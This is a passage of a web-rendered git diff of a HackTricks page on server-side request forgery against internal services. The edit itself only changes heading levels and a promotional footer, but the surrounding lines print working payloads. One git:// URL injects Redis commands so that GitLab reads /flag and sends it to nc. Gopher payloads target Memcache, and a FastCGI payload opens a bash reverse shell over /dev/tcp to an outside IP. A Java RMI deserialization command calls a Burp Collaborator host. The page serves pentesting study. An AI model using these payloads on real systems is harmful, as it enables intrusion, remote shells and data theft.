git://[0:0:0:0:0:ffff:127.0.0.1]:6379/%0D%0A%20multi%0D%0A%20sadd%20resque%3Agitlab%3Aqueues%20system%5Fhook%5Fpush%0D%0A%20lpush%20resque%3Agitlab%3Aqueue%3Asystem%5Fhook%5Fpush%20%22%7B%5C%22class%5C%22%3A%5C%22GitlabShellWorker%5C%22%2C%5C%22args%5C%22%3A%5B%5C%22class%5Feval%5C%22%2C%5C%22open%28%5C%27%7Ccat%20%2Fflag%20%7C%20nc%20127%2E0%2E0%2E1%202222%5C%27%29%2Eread%5C%22%5D%2C%5C%22retry%5C%22%3A3%2C%5C%22queue%5C%22%3A%5C%22system%5Fhook%5Fpush%5C%22%2C%5C%22jid%5C%22%3A%5C%22ad52abc5641173e217eb2e52%5C%22%2C%5C%22created%5Fat%5C%22%3A1513714403%2E8122594%2C%5C%22enqueued%5Fat%5C%22%3A1513714403%2E8129568%7D%22%0D%0A%20exec%0D%0A%20exec%0D%0A/ssrf123321.git
|
||||
```
|
||||
|
||||
# Memcache
|
||||
## Memcache
|
||||
|
||||
**Commonly bound port: 11211**
|
||||
|
||||
|
@ -622,7 +617,7 @@ gopher://[target ip]:11211/_%0d%0aset ssrftest 1 0 147%0d%0aa:2:{s:6:"output";a:
|
|||
gopher://192.168.10.12:11211/_%0d%0adelete ssrftest%0d%0a
|
||||
```
|
||||
|
||||
# Apache Tomcat
|
||||
## Apache Tomcat
|
||||
|
||||
**Commonly bound ports: 80,443 (SSL),8080,8443 (SSL)**
|
||||
|
||||
|
@ -634,7 +629,7 @@ CTF writeup using this technique:
|
|||
|
||||
[From XXE to RCE: Pwn2Win CTF 2018 Writeup](https://bookgin.tw/2018/12/04/from-xxe-to-rce-pwn2win-ctf-2018-writeup/)
|
||||
|
||||
# FastCGI
|
||||
## FastCGI
|
||||
|
||||
**Commonly bound ports: 80,443 (SSL)**
|
||||
|
||||
|
@ -644,7 +639,7 @@ This was taken from [here](https://blog.chaitin.cn/gopher-attack-surfaces/).
|
|||
gopher://127.0.0.1:9000/_%01%01%00%01%00%08%00%00%00%01%00%00%00%00%00%00%01%04%00%01%01%10%00%00%0F%10SERVER_SOFTWAREgo%20/%20fcgiclient%20%0B%09REMOTE_ADDR127.0.0.1%0F%08SERVER_PROTOCOLHTTP/1.1%0E%02CONTENT_LENGTH97%0E%04REQUEST_METHODPOST%09%5BPHP_VALUEallow_url_include%20%3D%20On%0Adisable_functions%20%3D%20%0Asafe_mode%20%3D%20Off%0Aauto_prepend_file%20%3D%20php%3A//input%0F%13SCRIPT_FILENAME/var/www/html/1.php%0D%01DOCUMENT_ROOT/%01%04%00%01%00%00%00%00%01%05%00%01%00a%07%00%3C%3Fphp%20system%28%27bash%20-i%20%3E%26%20/dev/tcp/172.19.23.228/2333%200%3E%261%27%29%3Bdie%28%27-----0vcdb34oju09b8fd-----%0A%27%29%3B%3F%3E%00%00%00%00%00%00%00
|
||||
```
|
||||
|
||||
# Java RMI
|
||||
## Java RMI
|
||||
|
||||
**Commonly bound ports: 1090,1098,1099,1199,4443-4446,8999-9010,9999**
|
||||
|
||||
|
@ -659,21 +654,14 @@ $ rmg serial 127.0.0.1 1090 CommonsCollections6 'curl example.burpcollaborator.n
|
|||
[+] SSRF Payload: gopher://127.0.0.1:1090/_%4a%52%4d%49%00%02%4c%50%ac%ed%00%05%77%22%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%02%44%15%4d[...]
|
||||
```
|
||||
|
||||
|
||||
<details>
|
||||
|
||||
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
|
||||
|
||||
- Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
||||
|
||||
- Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
|
||||
- Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||
|
||||
- **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
|
||||
|
||||
- **Share your hacking tricks by submitting PRs to the [hacktricks repo](https://github.com/carlospolop/hacktricks) and [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)**.
|
||||
* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
||||
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||
* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
|
||||
* **Share your hacking tricks by submitting PRs to the** [**hacktricks repo**](https://github.com/carlospolop/hacktricks) **and** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud).
|
||||
|
||||
</details>
|
||||
|
||||
|
||||
|
|
Loading…
Reference in a new issue